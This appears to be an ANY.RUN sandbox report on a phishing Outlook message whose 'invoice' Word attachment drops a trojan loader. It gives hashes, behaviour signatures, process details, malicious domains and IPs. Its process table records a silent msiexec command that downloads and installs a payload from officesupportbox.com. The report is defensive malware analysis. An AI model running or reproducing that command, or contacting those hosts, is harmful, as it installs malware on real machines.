analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0a9d_0f35_5aa07f51_42d0_4d7e_a6db_ed4bc7a7f17f.eml (72.3 KB).msg

Full analysis: https://app.any.run/tasks/95fd17a1-ca39-4e86-9c61-719c4baec22b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 08, 2018, 06:52:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

1CA9CA32160DCA603FBED5CEC45AE280

SHA1:

24BA0759EE38C1F2C84A9598F2D6CBCD5DF453E7

SHA256:

E5EB2EAA60D45D21C859DB536AE6F61077EABA26A662F6D299F15A5E1C6A0259

SSDEEP:

1536:4GX1vQYwGcDKY8S5GxvSt3y83D2hY2Mgmx32p:4GX1vxcaKt3R4Y2Dmxg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 3200)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3580)

    • Application was dropped or rewritten from another process

      • btc.exe (PID: 3768)
      • WMIsvc.exe (PID: 1100)
      • exit.exe (PID: 536)
      • exit.exe (PID: 3372)
      • winserv.exe (PID: 3992)

    • Loads dropped or rewritten executable

      • cmd.exe (PID: 4040)

    • Changes the autorun value in the registry

      • reg.exe (PID: 3628)

  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2860)
      • winserv.exe (PID: 3992)

    • Application launched itself

      • WINWORD.EXE (PID: 3200)

    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 2860)
      • WINWORD.EXE (PID: 3200)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3580)
      • WMIsvc.exe (PID: 1100)
      • cmd.exe (PID: 4040)
      • btc.exe (PID: 3768)

    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 536)
      • exit.exe (PID: 3372)

    • Creates files in the program directory

      • btc.exe (PID: 3768)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 4020)

    • Reads Environment values

      • winserv.exe (PID: 3992)

    • Reads Windows Product ID

      • winserv.exe (PID: 3992)

    • Reads the machine GUID from the registry

      • winserv.exe (PID: 3992)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 4020)

    • Connects to unusual port

      • winserv.exe (PID: 3992)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3200)
      • OUTLOOK.EXE (PID: 2860)
      • WINWORD.EXE (PID: 3572)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3200)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3580)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 3580)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (46.5)
.oft | Outlook Form Template (27.2)
.doc | Microsoft Word document (20.9)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
109
Monitored processes
74
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe wmisvc.exe exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs btc.exe exit.exe no specs cmd.exe no specs reg.exe winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\0a9d_0f35_5aa07f51_42d0_4d7e_a6db_ed4bc7a7f17f.eml (72.3 KB).msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3200"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IGT6H8TZ\invoice-07 11 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3572"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3616C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvcC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3580C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1100"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
536"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeWMIsvc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wiskas
Exit code:
0
Version:
1.0.0.0
4040cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2924ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2400ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
4 458
Read events
3 520
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
7
Text files
38
Unknown types
6

Dropped files

PID
Process
Filename
Type
2860OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR1E31.tmp.cvr
MD5:
SHA256:
2860OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFB5D36157850B7D9D.TMP
MD5:
SHA256:
2860OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IGT6H8TZ\invoice-07 11 2018 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3200WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR40AD.tmp.cvr
MD5:
SHA256:
3200WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_544D07BA-15A6-4263-8D33-4849748B4910.0\95457FC0.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_544D07BA-15A6-4263-8D33-4849748B4910.0\~DF84CBDBB63283A2C3.TMP
MD5:
SHA256:
2860OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:0EC497CAA33B65DE33A688E5BDCD4B5F
SHA256:7CE018A52A12069785C75A0718FEA183E248AF8937A3022DC33E7FE90350ED9C
3572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_544D07BA-15A6-4263-8D33-4849748B4910.0\mso4DAE.tmpcompressed
MD5:5BF175220C69273EC055105056012B93
SHA256:32A592B81172302E44620EB0103330B03C73492BDADDEFDC48B19D653D638D73
3200WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_544D07BA-15A6-4263-8D33-4849748B4910.0\95457FC0.docdocument
MD5:D5196A49F3C6B7C354CB8C76BBB60ED5
SHA256:2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958
3200WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E4E945D42F3398DF7B3C472EF7CEBC89
SHA256:189B7124DC7457025B7E72FAD81EE4C1953610450A54B2DEEDAD7230FFF338C6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2860
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3580
msiexec.exe
GET
200
185.244.130.88:80
http://officesupportbox.com/WMIsvc
unknown
executable
3.57 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2860
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3580
msiexec.exe
185.244.130.88:80
officesupportbox.com
malicious
3992
winserv.exe
89.144.25.16:5655
GHOSTnet GmbH
DE
suspicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
officesupportbox.com
  • 185.244.130.88
malicious
yandex.com
  • 213.180.204.62
whitelisted

Threats

PID
Process
Class
Message
3580
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3580
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
08-11-2018_06:53:41:004#T:Error #20 @2
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0a9d_0f35_5aa07f51_42d0_4d7e_a6db_ed4bc7a7f17f.eml (72.3 KB).msg